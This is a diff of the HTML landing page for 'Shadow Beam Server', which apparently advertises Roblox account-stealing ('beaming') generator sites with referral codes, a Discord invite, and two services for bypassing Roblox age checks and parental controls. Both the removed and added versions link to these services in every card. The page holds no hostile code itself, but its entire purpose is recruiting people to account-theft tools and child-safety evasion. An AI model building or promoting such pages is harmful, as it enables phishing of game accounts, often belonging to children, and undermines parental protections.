--- a/index.html
+++ b/index.html
@@ -5,40 +5,59 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Shadow Beam Server</title>
   <link rel="stylesheet" href="style.css">
-  <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&display=swap" rel="stylesheet">
 </head>
 <body>
-  <div class="stars"></div>
+  <div class="background-logo"></div>
 
-  <div class="container">
-    <!-- Logo -->
-    <img src="images/logo.png" alt="My Logo" class="logo">
+  <header>
+    <h1>🚀 WE ARE BACK! SHADOW BEAMERS ⚡</h1>
+    <a href="https://dsc.gg/shadow-site" class="btn">JOIN OUR DISCORD</a>
+  </header>
 
-    <p class="subtitle">#1 Beaming generators</p>
+  <section class="grid">
+    <div class="card">
+      <h2>🔥 Main Site</h2>
+      <ul>
+        <li>⚡ Fast Performance</li>
+        <li>🌐 Best Domains</li>
+        <li>🔒 Secure Access</li>
+        <li>🚀 Quick Login</li>
+      </ul>
+      <a href="https://immortal.st/?code=MjU5NDA5ODE0MDYwMDc4MDUzOF83NjU0Nzg1MTcyMDEzMjA1MzEx" class="cta">Get Access ⚡</a>
+    </div>
 
-    <!-- Discord Button -->
-    <a href="https://dsc.gg/shadow-site" class="btn discord">Join Discord</a>
+    <div class="card1">
+      <h2>💎 Main Site 2</h2>
+      <ul>
+        <li>✨ Premium Access</li>
+        <li>⚡ Ultra Fast</li>
+        <li>🔒 Secure Connection</li>
+        <li>🚀 Instant Use</li>
+      </ul>
+      <a href="https://shockify.st/?code=MzYxMjc0NzEzNzIzOTczMjAxOF83NTQzNzgzMTMxMzM2MDgyNTI5Xzc2NTQ3ODUxNzIwMTMyMDUzMTE=" class="cta">Start Now 💎</a>
+    </div>
 
-    <!-- Generator Buttons -->
-    <h2 class="generators-title">Generators</h2>
-    <a href="https://immortal.st/?code=MjU5NDA5ODE0MDYwMDc4MDUzOF83NjU0Nzg1MTcyMDEzMjA1MzEx" class="btn main">MAIN SITE</a>
-    <a href="https://shockify.st/?code=MzYxMjc0NzEzNzIzOTczMjAxOF83NTQzNzgzMTMxMzM2MDgyNTI5Xzc2NTQ3ODUxNzIwMTMyMDUzMTE=" class="btn site2">SITE 2</a>
-    <a href="#" class="btn site3">SITE 3 [SOON]</a>
-    
-    <h2 class="bypasser-title">Bypasser</h2>
-    <a href="https://rbx-tool.com/BypassAge/Accountss" class="btn main">MAIN BYPASSER</a>
-    <a href="https://roblox-parental-control-bypass.vercel.app/parentcontrol/Accounts" class="btn main">BYPASSER 2</a>
-  </div>
-  <script>
-    // Scroll down 1 pixel every 10ms
-    function autoScroll() {
-      window.scrollBy(0, 1); // x=0, y=1
-      if ((window.innerHeight + window.scrollY) < document.body.offsetHeight) {
-        setTimeout(autoScroll, 10);
-      }
-    }
+    <div class="card2">
+      <h2>⚡ BYPASSER</h2>
+      <ul>
+        <li>🔥 Ultra Fast Access</li>
+        <li>✨ Premium Performance</li>
+        <li>🔐 Secure Protocol</li>
+        <li>💼 Age Bypasser</li>
+      </ul>
+      <a href="https://rbx-tool.com/BypassAge/Accountss" class="cta">Elite Access ⚡</a>
+    </div>
 
-    autoScroll();
-  </script>
+    <div class="card3">
+      <h2>🍪 BYPASSER 2</h2>
+      <ul>
+        <li>🔄 Auto Refresh</li>
+        <li>🌍 IP Bypass</li>
+        <li>⚡ Instant Activation</li>
+        <li>🛡️ Protection Layer</li>
+      </ul>
+      <a href="https://roblox-parental-control-bypass.vercel.app/parentcontrol/Accounts" class="cta">Refresh Now 🍪</a>
+    </div>
+  </section>
 </body>
 </html>
